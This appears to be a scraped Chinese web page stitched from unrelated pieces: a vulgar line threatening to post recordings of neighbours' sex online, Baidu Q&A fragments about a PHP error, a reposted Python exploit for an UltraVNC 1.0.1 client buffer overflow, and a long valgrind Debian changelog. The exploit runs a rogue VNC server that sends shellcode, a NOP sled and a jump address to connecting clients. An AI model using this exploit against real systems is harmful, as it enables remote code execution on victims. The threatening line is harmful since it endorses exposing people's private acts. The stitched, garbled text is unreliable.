15邻居我让你走了 鹿晗叫,作爱叫这么大声,够簜的,我就录下来放在网上,大家都来听听这对簜@妇

caseCOMMAND:BUFFER(x,y)=CHESSNULL;xCaret=0; - 叫阿莫西中心 - 中国网络使得骄傲马戏中心!
caseCOMMAND:BUFFER(x,y)=CHESSNULL;xCaret=0;
Fatal error: out of dynamic memory in yy_create_buffer() in Unknown on line 0_百度知道
Fatal error: out of dynamic memory in yy_create_buffer() in Unknown on line 0
望指教我的垺务器今天在跑OA系统时出现Fatal error: out of dynamic memory in yy_create_buffer() in Unknown on line 0 该如何处理
我来帮怹解答
其他类似问题
等待您来回答
您可能关注嘚推广
下载知道APP
随时随地咨询
出门在外也不愁Ultr@VNC &= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
您现在的位置:&&
Ultr@VNC &= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit
来源:&作者:iiprogram&&出处:
  #!/usr/bin/python#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm#POC by Paul Haas #Tested on WinXP SP 2: Launches Calcimport socket, structHOST = ''&&&&&&&&&&&&&&&&&&&&&& # LocalhostPORT = 5900&&&&&&&&&&&&&&&&&&&& # VNC ServerBOFSZ = 1024&&&&&&&&&&&&&&&&&&& # Buffer SizeHEAD = &RFB 003.006\n&&&&&&&&&& # VNC HeaderMESSAGE = &Requires Ultr@VNC Authentication\n&NOP = &\x90&&&&&&&&&&&&&&&&&&&& # Standard x86 NOPJMP = &\xE9\x1B\xFC\xFF\xFF&&&& # JMP To BUFFESP = &\xE0\x3A\xB4\x76&&&&&&&& # winmm.dll: JMP %espPOP = &PASSWORD&&&&&&&&&&&&&&&& # RET 8# win32_exec - CMD=calc Size=160 SHELLCODE = \&\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe1&+\&\x7c\x05\xd9\x83\xeb\xfc\xe2\xf4\x1d\x94\x41\xd9\xe1\x7c\x8e\x9c&+\&\xdd\xf7\x79\xdc\x99\x7d\xea\x52\xae\x64\x8e\x86\xc1\x7d\xee\x90&+\&\x6a\x48\x8e\xd8\x0f\x4d\xc5\x40\x4d\xf8\xc5\xad\xe6\xbd\xcf\xd4&+\&\xe0\xbe\xee\x2d\xda\x28\x21\xdd\x94\x99\x8e\x86\xc5\x7d\xee\xbf&+\&\x6a\x70\x4e\x52\xbe\x60\x04\x32\x6a\x60\x8e\xd8\x0a\xf5\x59\xfd&+\&\xe5\xbf\x34\x19\x85\xf7\x45\xe9\x64\xbc\x7d\xd5\x6a\x3c\x09\x52&+\&\x91\x60\xa8\x52\x89\x74\xee\xd0\x6a\xfc\xb5\xd9\xe1\x7c\x8e\xb1&+\&\xdd\x23\x34\x2f\x81\x2a\x8c\x21\x62\xbc\x7e\x89\x89\x8c\x8f\xdd&+\&\xbe\x14\x9d\x27\x6b\x72\x52\x26\x06\x1f\x64\xb5\x82\x7c\x05\xd9&#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFFbuff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))buff = buff+ESP+POP+JMP#Egg = VNC Server Error Reply and Size of Reply + buffegg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buffprint 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'print 'POC by Paul Haas 'print 'Server listening on port', PORT#Server Loopwhile(1):&&&&&& s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&&&&&& s.bind((HOST, PORT))&&&&&& s.listen(1)&&&&&& conn, addr = s.accept()&&&&&& print 'Connection by', addr&&&&&& conn.send(HEAD)&&&&&& data = conn.recv(12)&&&&&& conn.send(egg)&&&&&& conn.close()
上一篇:下一篇:
(2240次浏览)(1978次浏览)(1977次浏览)(1798次浏览)(1721次浏覽)(1444次浏览)(1397次浏览)(1295次浏览)(1269次浏览)(1238次浏览)
06-06-06-01-14valgrind (1:3.7.0-0ubuntu3.1) precise- urgency=low
* fix-buffer-overflows.patch: fix overflows in vgdb
* 05_fix-callgrind_control.patch: fix valgrind process name (LP: #1036283)
* fix-VEX-PCMPxSTRx.patch: fix strstr handling (LP: #1027977)
-- Julian Taylor
Wed, 10 Oct :28 +0200
valgrind (1:3.7.0-0ubuntu3) urgency=low
* Add uinput ioctl wrappers to fix false positive errors. (LP: #958095)
- Add 0011-uinput-ioctls.patch.
-- Chase Douglas
Sat, 17 Mar :21 -0700
valgrind (1:3.7.0-0ubuntu2) urgency=low
* Allow glibc 2.15 in the configure checks. (LP: #934127)
- Add 0009-glibc-215.patch, cherry-picked from upstream.
- Add 0010-automake-1.11.2.patch by Gregorio Guidi.
- Use dh-autoreconf instead of autotools-dev.
-- Felix Geyer
Fri, 17 Feb :23 +0200
valgrind (1:3.7.0-0ubuntu1) urgency=low
* New upstream release
* Drop patches that are applied upstream or no longer relevant:
0003-prevent-gcc-4.6-warnings-with-valgrind.h.patch
0005-catch-manpages-errors.patch
0007-implement-extra-dwarf-ops-gcc-461.patch
0008-configure-support-linux-3.patch
* debian/rules: No longer pass -marm, it now builds in Thumb mode on ARM.
-- Jani Monoses
Fri, 06 Jan :30 +0200
valgrind (1:3.6.1-6ubuntu2) urgency=low
* No-change rebuild to drop spurious libsfgcc1 dependency on armhf.
-- Adam Conrad
Fri, 02 Dec :15 -0700
valgrind (1:3.6.1-6ubuntu1) urgency=low
* Drop lpia support.
* Drop 60_thumb-sigill- we're building in ARM mode and Thumb
support was implemented upstream differently.
* Merge with Debian testing/unstable:
- Drop all Ubuntu dpatches, added in Debian as regular patches.
- Use DEB_HOST_ARCH_CPU instead of DEB_HOST_GNU_CPU to check the host CPU
for consistency with armv7 checks in rules.
- Drop should be fixed with new dh-based rules.
Remaining changes:
- Add ppc64 support:
. Build-dep on gcc-multilib and libc6-dev-powerpc on ppc64
. Add ppc64 to valgrind's Architecture list.
- Update documentation on creating snapshots in debian/copyright and add
debian/valgrind-docs-build.diff to help creating these (works around an
issue with building the docs during make dist).
- Pass -marm in CFLAGS when DEB_HOST_GNU_CPU is arm, but add note that
this is fixed upstream and point at KDE #247978.
-- Lo?c Minier
Mon, 17 Oct :02 +0200
valgrind (1:3.6.1-6) urgency=low
* Upload with maintainer's consent.
* debian/patches/0007-implement-extra-dwarf-ops-gcc-461.patch:
+ A from upstream r11856, makes valgrind work again with binaries
built with recent gcc versions (Closes: #632969).
* debian/patches/0008-configure-support-linux-3.patch:
+ A from upstream r11796, add support for Linux 3.x to configure
script (Closes: #633094).
-- Julien BLACHE
Fri, 08 Jul :11 +0200
valgrind (1:3.6.1-5) urgency=low
* debian/rules:
- use autotools-dev dh_autotools-dev_updateconfig.
- do now strip under /usr/lib/valgrind (Closes: 475562).
- use dh 7 to reduce debian/rules cruft.
* Add armhf to the supported architectures.
-- Pierre Habouzit
Mon, 23 May :59 +0200
valgrind (1:3.6.1-4) urgency=low
* Fix patches/0004-allow-or-quoting-of-strings-in-.valgrindrc.patch: out was
copied too early leading to bad option parsing in case of leading spaces
(Closes: 6496).
-- Pierre Habouzit
Thu, 12 May :22 +0200
valgrind (1:3.6.1-3) urgency=low
* update 0002-version.patch to loosen the checks on the arm version
(Closes: 592614).
-- Pierre Habouzit
Thu, 12 May :29 +0200
valgrind (1:3.6.1-2) urgency=low
* Enable valgrind build on armel (Closes: 592614):
- s/arm/armel/ in debian/
- build for armv7 since valgrind doesn't support older arm CPUs,
thanks to Lo?c Minier for the implementation details.
* Add 0004-allow-or-quoting-of-strings-in-.valgrindrc.patch to allow parsing
of options with spaces in ~/.valgrindrc (Closes: 507236).
* Catch manpages build failures (Closes: 599563) thanks to Stefano Rivera.
* Add suppression for __nss_database_lookup leaks in debian.supp
(Closes: 598870).
* String things not under /usr/lib/valgrind (Closes: 475562), document into
the lintian-overrides why it shouldn't be stripped, namely
http://valgrind.org/docs/manual/dist.readme-packagers.html.
* Add 0006-workaround-SIGSEGV-on-PPC.patch to workaround PPC SIGSEGV
(Closes: 603961).
-- Pierre Habouzit
Tue, 10 May :23 +0200
valgrind (1:3.6.1-1) urgency=low
* Migrate to format 3.0 (quilt):
- use upstream .tar.bz2
- migrate patches from dpatch to debian/patches/*.
- valgrind builds twice in a row (Closes: 549554).
* Add myself to Uploaders.
* New upstream release (Closes: 5180).
* Add patches/0003-prevent-gcc-4.6-warnings-with-valgrind.h.patch to prevent
warnings about set but unused variables with gcc-4.6.
* debian/control:
- Bump standards version (no changes needed).
- Add VCS-* Headers.
- Add Homepage Header.
* Lintian fixes:
- Add missing ${misc:Depends} in debian/control.
- fix debian-rules-ignores-make-clean-error.
- migrate to dh_lintian for overrides, and update them.
- remove article from debian/control Description.
-- Pierre Habouzit
Mon, 09 May :27 +0200
valgrind (1:3.6.1-0ubuntu3) urgency=low
* New dpatch, 71_linux-3-support, fixes FTBFS on 3.x kernels (as checked
with `uname -r` during build, so doesn't yet affect Ubuntu buildds); from
SVN r11796 and r11797; LP: #868004.
Refresh autoconf patch.
* Rename files and update series to use *.dpatch consistently.
-- Lo?c Minier
Wed, 05 Oct :53 +0200
valgrind (1:3.6.1-0ubuntu2) urgency=low
* New dpatch 70_gcc-4.6.1-dwarf-ops_svn-r11856, cherry-picked from SVN
r11856; adds support for some DWARF ops that GCC 4.6.1 seems to use
(KDE #275284).
* Sort patches by patch number in 00list.
-- Lo?c Minier
Tue, 05 Jul :20 +0200
valgrind (1:3.6.1-0ubuntu1) urgency=low
* New upstream release
- support for glibc 2.13, fixes FTBFS on all archs.
* debian/patches/70_thumb2_fix.dpatch: Drop, included upstream.
* debian/patches/02_version.dpatch:
* debian/patches/99_autoreconf.dpatch: Update.
-- Jani Monoses
Sun, 27 Feb :35 +0200
valgrind (1:3.6.0-0ubuntu3) urgency=low
* Build on ppc64.
-- Colin Watson
Mon, 21 Feb :23 +0000
valgrind (1:3.6.0-0ubuntu2) urgency=low
* debian/patches/70_thumb2_fix.dpatch: Fix unhandled instruction
case which prevents running valgrind on Thumb2 armel binaries
linked to system libraries.
-- Jani Monoses
Sat, 22 Jan :11 +0200
valgrind (1:3.6.0-0ubuntu1) urgency=low
* New upstream release
* Refresh 02_version.dpatch, 99_autoreconf.dpatch.
* Drop 91_build_with_fno_stack_protector.dpatch, integrated upstream.
-- Steve Langasek
Tue, 07 Dec :50 +0000
valgrind (1:3.6.0~svnubuntu2) urgency=low
* Remove BUILD_ALL_DOCS=n this isn't needed anymore as
texlive-base got fixed.
* Pass CFLAGS to configure, and also to make due to KDE #247980 -- the make
part really needs to be reverted as it requires duplicating the upstream
flags right now.
* Honor noopt in DEB_BUILD_OPTIONS by passing -O0 in CFLAGS when noopt is
* Pass -marm in CFLAGS when DEB_HOST_GNU_CPU works around new FTBFS
-- Lo?c Minier
Sun, 15 Aug :28 +0200
valgrind (1:3.6.0~svnubuntu1) urgency=low
* New upstream snapshot.
- Supports GLIB 2.12; LP: #602132.
- Drop dpatch 01_pcm- fixed upstream
KDE #227325.
- Drop dpatch 01_more-vg-n- merged upstream.
- Drop dpatch 80_splice_ merged upstream.
- Update dpatch 99-autoreconf.
- Update documentation on creating snapshots in debian/copyright and add
debian/valgrind-docs-build.diff to help creating these (works around an
issue with building the docs during make dist).
-- Lo?c Minier
Sun, 15 Aug :00 +0200
valgrind (1:3.6.0~svnubuntu5) urgency=low
* No-change rebuild to get the package picked up for building on armel.
-- Steve Langasek
Tue, 27 Apr :59 +0100
valgrind (1:3.6.0~svnubuntu4) urgency=low
* New dpatch, 60_thumb-sigill-fixes, from upstream KDE #231108, fixes
SIGILLs on startup when build in Thumb mode.
This allows valgrind-ing
simple ARM-mode binaries, but supporting Thumb-mode binaries requires much
LP: #537458.
-- Lo?c Minier
Fri, 26 Mar :17 +0100
valgrind (1:3.6.0~svnubuntu3) urgency=low
* New dpatch, 80_splice_backport, backport of splice() support from r11055;
LP: #537688.
-- Lo?c Minier
Sat, 13 Mar :14 +0100
valgrind (1:3.6.0~svnubuntu2) urgency=low
* Fix typo in 02_version dpatch: default.supp instead of debian.supp.
* Only distclean if there's a Makefile.
* Clean debian.supp.
* Fix dependencies in rules to be -j safe and to pa
also, use $(DPATCH_STAMPFN) dep instead of patch as the latter is PHONY
* Forwarded manpage update proposal upstream in KDE #226609 and disabled
patch 01_manpage since it fails to unapply due to upstream removing the
manpage in distclean.
* Configure with --disable-maintainer-mode.
* Bump debhelper build-dep to &= 5.
-- Lo?c Minier
Fri, 12 Feb :11 +0100
valgrind (1:3.6.0~svnubuntu1) urgency=low
* New upstream SVN snapshot from r11040 (and VEX r1959).
- Document in copyright that this snapshot tarball was created with &make
BUILD_ALL_DOCS=no dist& in svn://svn.valgrind.org/valgrind/trunk while
Debian #566591 affects the PDF build.
- Also add BUILD_ALL_DOCS=no to rules for the same reason.
- Update patch 02_version to apply to configure.in instead of configure
and to only patch the version, bug contact, and DEFAULT_SUPP.
- Drop patch 92_glibc-2.11-support, in upstream tarball.
- Update patch 99_autoreconf.
- Add armel to binary package architecture, lots of recent upstream
development toward an ARM port recently!
-- Lo?c Minier
Fri, 12 Feb :15 +0100
valgrind (1:3.6.0~svn11254+nmu1) urgency=medium
* Non-maintainer upload.
* Re-upload as 1:3.6.0~svn11254+nmu1 since i386 already had
1:3.6.0~svn11254+b1.
* Set urgency to medium.
-- gregor herrmann
Wed, 20 Oct :09 +0200
valgrind (1:3.6.0~svn) urgency=low
* Non-maintainer upload.
* Fix &Man page misbuilt on i386&: add docbook-xml to Build-D thanks
to Stefano Rivera for the analysis (closes: #597180).
-- gregor herrmann
Sat, 09 Oct :51 +0200
valgrind (1:3.6.0~svn11254) urgency=low
* New SVN snapshot.
(Closes: #574810, #592345, #584912, #588997, #588263, #585809, #580210)
* debian/control: Dropped build dependency on gcc-4.3 on amd64 (Closes: #559520)
* debian/patches/01_more-vg-n-threads.dpatch:
- Removed. Already applied by upstream
* debian/patches/01_more-vg-n-segments.dpatch
- Increased VG_N_SEGMENTS to 25000 (Closes: #491195)
* debian/README.Debian:
- Updated (Closes: #433426)
* debian/valgrind.bash:
- Updated to make tools autocomplete well. (Closes: #549218)
-- Andrés Roldán
Mon, 09 Aug :45 +0000
valgrind (1:3.5.0+3.6.0svn) urgency=low
* New SVN snapshot.
-- Andrés Roldán
Wed, 09 Jun :17 +0000
valgrind (1:3.5.0+3.6.0svn) urgency=low
* debian/rules:
- Remove config.sub and config.guess symlinks before copying.
* debian/control:
- Added ARM as a supported architecture
-- Andrés Roldán
Tue, 08 Jun :48 +0000
valgrind (1:3.5.0+3.6.0svn) urgency=low
* New experimental release based on SVN trunk ()
* debian/control:
- Build-Depend on docbook, docbook-xsl and xsltproc to build documentation.
* debian/rules
- Create documentation
* debian/manpages:
- Added additional manpages
-- Andrés Roldán
Tue, 08 Jun :27 +0000
valgrind (1:3.5.0-3ubuntu2) urgency=low
* New patches, 92_glibc-2.11-support, cherry-picked from upstream r10941;
adds glibc 2.11 support, and 99_autoreconf.
-- Lo?c Minier
Fri, 12 Feb :53 +0100
valgrind (1:3.5.0-3ubuntu1) urgency=low
* Merge from Debian testing.
Remaining changes:
- Refresh 91_build_with_fno_stack_protector.dpatch.
- Add lpia to Architecture.
- Drop completely bogus or'ed build-dep on gcc-4.3 on amd64
* Dropped changes, superseded in Debian:
- Move libc6-dbg to Recommends
-- Steve Langasek
Sat, 05 Dec :45 +0000
valgrind (1:3.5.0-3) urgency=low
* Rebuilt againts libc6 2.10.1.
* debian/control:
- Now libc6-dbg is a dependency (valgrind won't work without it now)
(Closes: #556542, #556165, #553016)
- Valkyrie added to suggested packages.
-- Andrés Roldán
Tue, 17 Nov :26 +0000
valgrind (1:3.5.0-2ubuntu2) urgency=low
* Drop completely bogus or'ed build-dep on gcc-4.3 on amd64 - if the
package in the archive builds for biarch, we shouldn't allow non-multilib
gcc as an alternative, this would just result in a package misbuild.
-- Steve Langasek
Thu, 08 Oct :53 +0000
valgrind (1:3.5.0-2ubuntu1) urgency=low
* Merge from debian unstable, remaining changes:
- Refresh 91_build_with_fno_stack_protector.dpatch.
- Add lpia to Architecture.
* Move libc6-dbg to Recommends (LP: #423485).
-- Kees Cook
Fri, 02 Oct :36 -0700
valgrind (1:3.5.0-2) urgency=low
* debian/control:
- Added libc6-dev-i386 to build-dependencies on amd64.
May reopen #507752 but closes: #548067.
-- Andrés Roldán
Thu, 24 Sep :57 +0000
valgrind (1:3.5.0-1) urgency=low
* New upstream version. (Closes: #545700)
* debian/patches/02_version:
- Updated to fit this new version (Thanks to Andreas Beckmann)
* debian/patches/01_pcm-ioctl.patch:
* debian/patches/01_more-vg-n-threads.dpatch:
- Added to increas VG_N_THREADS to 500. (Closes: #514133)
* debian/docs:
- ACKNOWLEDGEMENTS file is gone
* debian/watch:
- Added (Again, thanks to Andreas Beckmann)
* debian/control:
- Removed Uploaders field (Closes: #519380, #540834)
* debian/valgrind.bash:
- Provides a first bash completion script for valgrind. (Closes: #539137)
Thanks to Jerome Reybert
* debian/debian.supp:
- Updated to fit Debian's libc6 2.10.x
-- Andrés Roldán
Wed, 09 Sep :29 +0000
valgrind (1:3.4.1-1ubuntu2) urgency=low
* Rebuild to include suppressions for libc6 2.10.x (LP: #423485).
-- Colin Watson
Fri, 04 Sep :18 +0100
valgrind (1:3.4.1-1ubuntu1) urgency=low
* Merge with D remaining changes:
- Add 91_build_with_fno_stack_protector.dpatch.
- Add lpia to Architecture.
-- Matthias Klose
Thu, 05 Mar :01 +0100
valgrind (1:3.4.1-1) urgency=low
* New upstream release.
* debian/debian.supp:
- Updated suppressions to fit libc6 2.9.x. (Closes: #516337, #516100)
* debian/copyright:
- Change the URL of valgrind to www.valgrind.org. (Closes:
* debian/patches/01_valgrind.pc.dpatch:
- Removed. Already fixed by upstream.
-- Andrés Roldán
Thu, 05 Mar :16 +0000
valgrind (1:3.4.0-1) urgency=low
* New upstream release. (Closes: #512816)
* debian/patches/01_valgrindrc.dpatch:
- Removed. Already applied by upstream.
-- Andrés Roldán
Thu, 29 Jan :26 +0000
valgrind (1:3.3.1-3) urgency=low
* debian/patches/01_valgrindrc.dpatch:
- New patch to avoid reading and executing .valgrindrc files unless done
by the onwer of the file. This fixes CVE- (Closes: #507312)
-- Andrés Roldán
Wed, 03 Dec :11 +0000
valgrind (1:3.3.1-2ubuntu1) urgency=low
* Merge from debian unstable, remaining changes:
- Add 91_build_with_fno_stack_protector.dpatch
- Add lpia to Architecture
-- Michael Vogt
Thu, 19 Jun :35 +0200
valgrind (1:3.3.1-2) urgency=low
* debian/rules:
- Forgot to copy debian-libc6-dbg.supp to /usr/lib/valgrind.
(Closes: #486021)
-- Andrés Roldán
Fri, 13 Jun :40 +0000
valgrind (1:3.3.1-1) urgency=low
* New upstream version.
* Re-debianized from the scratch.
* debian/valgrind.sh:
- Avoid to add the same suppression on programs that re-execute
themselves. (Closes: #479165)
* debian/control:
- Made valgrind buildable for etch. (Closes: #472335)
* Bumped standard version to 3.7.3
-- Andrés Roldán
Wed, 11 Jun :08 +0000
valgrind (1:3.3.0-1ubuntu1) urgency=low
* Merge with Debian, remaining changes:
- Add 91_build_with_fno_stack_protector.dpatch
- Add lpia to Architecture
-- Jonathan Riddell
Sun, 06 Jan :10 +0000
valgrind (1:3.3.0-1) urgency=low
* New upstream release. (Closes: #455855)
- Now valgrind will compile natively on glibc & 2.6
(Closes: #453195, #441749)
- Suppressions are now updated for the latest glibc on sid.
(Closes: #356777)
* debian/patches/01_amd64-nops.dpatch:
- Removed, already applied by upstream.
* debian/patches/01_suppression-strip.dpatch:
- Removed. Don't be jealous of your brother, Andy :)
* debian/patches/01_valgrind.pc.dpatch:
- Corrects pkg-config information. (Closes: #452307)
-- Andrés Roldán
Wed, 12 Dec :58 +0000
valgrind (1:3.2.3-3ubuntu2) urgency=low
* Fix FTBS with new libc6 2.7 not recognized by valgrind's
configure script (backported from svn)
- add debian/patches/92_valgrind-libc6-2.7.dpatch
- add debian/patches/99_update_configure.dpatch
- update debian/patches/00list
-- Fabien Tassin
Mon, 10 Dec :23 +0100
valgrind (1:3.2.3-3ubuntu1) urgency=low
* Merge from debian unstable, remaining changes:
- Build package for lpia
- Build using -fno-stack-protector
* Drop 21_amd64_kde148447_NEW_nop_codes.dpatch merged
into 01_amd64-nops.dpatch
- update debian/patches/00list
* Bump Standards-Version to 3.7.2
- update debian/control
* Drop DH_COMPAT=3 from rules and add compat=5
- update debian/rules
- add debian/compat
-- Fabien Tassin
Tue, 06 Dec :43 +0100
valgrind (1:3.2.3-3) urgency=low
* debian/FAQ.txt:
- Provided there to solve FTBFS if valgrind is built twice in a row
(Closes: #424129)
* debian/patches/01_amd64-nops.dpatch:
- Patch to handle new way of writing NOPs by binutils. (Closes: #437503)
* debian/patches/01_configure.dpatch:
- Merged into 02_version.patch
* debian/patches/03_valgrind-libc6-2.6.dpatch:
- Took off from dpatch and merged into debian diff.
-- Andrés Roldán
Thu, 23 Aug :13 +0000
valgrind (1:3.2.3-2ubuntu3) urgency=low
* debian/patches/21_amd64_kde148447_NEW_nop_codes.dpatch:
- import patch from http://bugs.kde.org/show_bug.cgi?id= to fix
LP: #148465.
-- Alexander Sack
Sat, 06 Oct :32 +0200
valgrind (1:3.2.3-2ubuntu2) urgency=low
* Build package for lpia.
-- Matthias Klose
Fri, 24 Aug :18 +0200
valgrind (1:3.2.3-2ubuntu1) urgency=low
* Merge with D remaining changes:
- Build using -fno-stack-protector.
-- Matthias Klose
Thu, 23 Aug :42 +0200
valgrind (1:3.2.3-2) urgency=low
* debian/patches/03_valgrind-libc6-2.6.dpatch:
- Patch based on Gentoo's to make valgrind compiles under glibc 2.6.
Thanks to francesco.. (Closes: #433899)
* debian/control:
- Depends on gcc-multilib [amd64] instead of libc6-dev-i386 [amd64] to
solve FTBFS on amd64. (Closes: #425834)
-- Andrés Roldán
Fri, 17 Aug :21 +0000
valgrind (1:3.2.3-1ubuntu2) urgency=low
* No-change upload to work around a soyuz bug and build on lpia.
-- Adam Conrad
Fri, 10 Aug :33 +1000
valgrind (1:3.2.3-1ubuntu1) urgency=low
* Merge with D remaining changes:
- Build using -fno-stack-protector.
- Build-depend on gcc-multilib.
-- Matthias Klose
Thu, 24 May :02 +0200
valgrind (1:3.2.3-1) urgency=low
* New upstream version
* debian/control:
- Removed ia32-libs-dev [amd64] and libc6-dev-i386 [amd64] dependencies.
(Closes: #357288, #341186)
* debian/valgrind.sh
- Removed /usr/X11R6/lib/debug from DBGPATH. (Closes: #365119)
* debian/debian.supp:
- Added suppressions for glibc static allocations. (Closes: #350347)
-- Andrés Roldán
1 Feb :46 +0000
valgrind (1:3.2.1-1ubuntu2) urgency=low
* Rebuild for changes in the amd64 toolchain.
* Set Ubuntu maintainer address.
-- Matthias Klose
5 Mar :22 +0000
valgrind (1:3.2.1-1ubuntu1) urgency=low
* Sync with Debian:
+ debian/control:
- Drop build dependency on ia32-libs-dev
+ debian/patches/91_build_with_fno_stack_protector.dpatch:
- Build with -fno-stack-protector to fix FTBFS
* debian/glibc-2.5.supp,
debian/rules:
+ Add suppresion file from SVN for glibc 2.5
-- Sebastian Dr?ge
Thu, 16 Nov :30 +0100
valgrind (1:3.2.1-1) urgency=low
* New upstream release.
-- Andrés Roldán
5 Oct :35 +0000
valgrind (1:3.2.0-2ubuntu3) urgency=low
* debian/patches/90_from_svn_fix_cfsi_len_assertion.dpatch:
- updated the limit, some applications were still not happy with the
previous one
-- Sebastien Bacher
Thu, 12 Oct :01 +0200
valgrind (1:3.2.0-2ubuntu2) urgency=low
* debian/patches/90_from_svn_fix_cfsi_len_assertion.dpatch:
- patch from SVN, fix cfsi-&len assertion on amd64 (Ubuntu: #60589)
* debian/patches/91_build_with_fno_stack_protector.dpatch:
- add -fno-stack-protector to CFLAGS to fix the build
-- Sebastien Bacher
6 Oct :18 +0200
valgrind (1:3.2.0-2ubuntu1) urgency=low
* Sync with Debian:
+ Drop build dependency on ia32-libs-dev
-- Sebastian Dr?ge
Mon, 26 Jun :17 +0200
valgrind (1:3.2.0-2) urgency=low
* New upstream release. (Closes: #373578)
- Now callgrind is one of the main valgrind tools.
- Add conflict (and provide) valgrind-callgrind.
* debian/patches/02_load-address:
- Not applied as it is not needed anymore.
-- Andrés Roldán
Thu, 15 Jun :07 +0000
valgrind (1:3.1.1-1) urgency=low
* Acknowledging NMU. Thanks Kurt.
* New upstream release
* Updated 02_version and 01_suppression-strip patches
* Updated debian.supp
* Suggests alleyoop and valgrind-callgrind instead of callgrind
-- Andrés Roldán
Wed, 29 Mar :53 +0000
valgrind (1:3.1.0-2.1) urgency=low
* Non-maintainer upload.
* Add build dependency on libc6-dev-i386 [amd64] | ia32-libs-dev [amd64]
so that it can get build on amd64.
(Closes: #341186)
-- Kurt Roeckx
4 Feb :53 +0100
valgrind (1:3.1.0-2) urgency=low
* debian/control:
- Updated package description.
- Added powerpc to Architecture list. (Closes: #270557)
* Changed valgrind base load address. (Closes: #341252)
-- Andrés Roldán
Wed, 30 Nov :24 +0000
valgrind (1:3.1.0-1) urgency=low
* New upstream release.
- Now it can load symbol table of large binaries.
(Closes: #337196, #319243)
- Now it runs on ppc. (Closes: #270557)
* debian/patches/01_suppression-strip.dpatch:
- Removes an existent Debian suppression.
-- Andrés Roldán
Mon, 28 Nov :15 +0000
valgrind (1:3.0.1-2) urgency=low
* debian/patches/02_version.dpatch:
- Adds &Debian& to package version string
* debian/debian.supp:
- Adds suppression for Debian's libc6 2.3.5 dynamic linker.
(Closes: #331727, #326832)
-- Andrés Roldán
2 Nov :58 +0000
valgrind (1:3.0.1-1) urgency=low
* New upstream version.
* Standard version is now 3.6.2.
-- Andrés Roldán
1 Sep :35 +0000
valgrind (1:3.0.0-1) urgency=low
* New upstream release. (Closes:
- Now valgrind run on AMD64.
* debian/patches/{01_manpage,01_configure,01_pcm-ioctl}.dpatch:
- Updated to fit this version.
* debian/patches/{01_vgPlain_do_syscall,11_errorcode}.dpatch:
- Removed. Not longer needed.
-- Andrés Roldán
Fri, 12 Aug :42 +0000
valgrind (1:2.4.1-1) urgency=low
* New stable release.
-- Andrés Roldán
2 Aug :20 +0000
valgrind (1:2.4.0-3) urgency=low
* debian/valgrind.sh:
- Prepends LD_LIBRARY_PATH over DBGPATH. (Closes: #304315)
- Adds GLIBCPP_FORCE_NEW=1 (for gcc = 3.4) to force C++ STL to use malloc and to free memory by
disabling memory caching (Closes: #307956)
* debian/patches/01_manpage.dpatch:
- New, adds reference to valgrind's authors and contributos on manpage.
(Closes: #304902)
* debian/patches/01_pcm-ioctl.dpatch:
- New, adds PCM ioctls. (Closes: #305051)
Patch sent by Samuel Thibault .
* debian/debian-libc6-dbg.supp:
- Updated. Thanks to Jeremy Nimmer .
(Closes: #302250)
-- Andrés Roldán
Fri, 20 May :30 +0000
valgrind (1:2.4.0-2) urgency=low
* debian/debian-libc6-dbg.supp:
- New file that includes suppressions for libc6-dbg/libpthread library.
(Closes: #302250)
* debian/valgrind.sh:
- As memcheck is officialy the default tool, removed --tool=memcheck from
VALGRIND_OPTS.
- Will use /usr/lib/debian-libc6-dbg.supp if and only if using libc6-dbg.
-- Andrés Roldán
8 Apr :28 +0000
valgrind (1:2.4.0-1) urgency=low
* New stable upstream release.
* debian/valgrind.1:
- Removed as it is already provided and maintained by upstream based on
Debian's manpage. (Closes: #293049, #298222)
-- Andrés Roldán
Mon, 28 Mar :35 +0000
valgrind (1:2.2.0+2.4.0rc4+1-1) urgency=low
* New RC upstream release.
- Fix unexpected SIGSEGV when using memcheck on programs where the
first write to a particular 64k chunk is done by the FPU.
- Fix a problem with the sys_futex wrapper which was inspecting
the wrong arguments for FUTEX_REQUEUE. (Closes: #299514)
- Format fixup for a debug printf.
-- Andrés Roldán
Tue, 15 Mar :00 +0000
valgrind (1:2.2.0+2.4.0rc4-1) urgency=low
* New RC upstream release.
- Make sure that an FP write to a distinguished map makes it
un-distinguished.
-- Andrés Roldán
Mon, 14 Mar :24 +0000
valgrind (1:2.2.0+2.4.0rc3-1) urgency=low
* New RC upstream release.
- Fix which prevents an assertion failure when a threaded program
forks, and the child starts a thread.
- Fix a problem in which signals which have the default action of
&ignore& (SIGCONT, WINCH, USR and CHLD) interrupted a blocked
For these signals, Valgrind doesn't set a signal handler
unless the client needs one.
- Remove segment merging from mprotect(), which was causing rtldi to
trigger a Valgrind internal error.
- Fix the parsing of the 'R' floating-point type in the stabs parser.
-- Andrés Roldán
Sat, 12 Mar :19 +0000
valgrind (1:2.2.0+2.4.0rc2-1) urgency=low
* Yet another RC upstream version.
* debian/patches/12_errhandling.dpatch:
- Removed. Already on upstream source.
-- Andrés Roldán
Fri, 11 Mar :46 +0000
valgrind (1:2.2.0+2.4.0rc1-1) urgency=low
* New RC upstream release. (See upstream's changelog) (Closes: #296323)
- libpthread has gone along with all the bugs associated with it.
Instead, Valgrind now emulates the kernel's threading syscalls
(clone, etc), and lets the user use your standard system
libpthread. (Closes: #283995)
- Signal handling should now be indistinguishable from running
natively. (Closes: #230785, #252520)
- Valgrind is built in Position Independent Executable (PIE) format
if the toolchain supports it.
This allows it to take advantage
of all the available address space on systems with 4Gbyte user
address spaces. (Closes: #272270, #288640)
* debian/debian.supp:
- Added zlib1g suppression. (Closes: #287603)
- Added pthread_initialize suppression.
* debian/patches/:
- Removed some patches as they are already on upstream source.
- {01_vgPlain_do_syscall,11_exitcode}.dpatch: Updated.
- 12_errhandling.dpatch: Stops the error handling code trying to
match object and function names against a suppression if it
wasn't able to obtain the relevant name.
-- Andrés Roldán
9 Mar :41 +0000
valgrind (1:2.2.0-4) urgency=low
* debian/patches/18_cpp-stabs.dpatch:
- This patch attempts to fix the parsing of C++ stabs involving ::
delimiters.
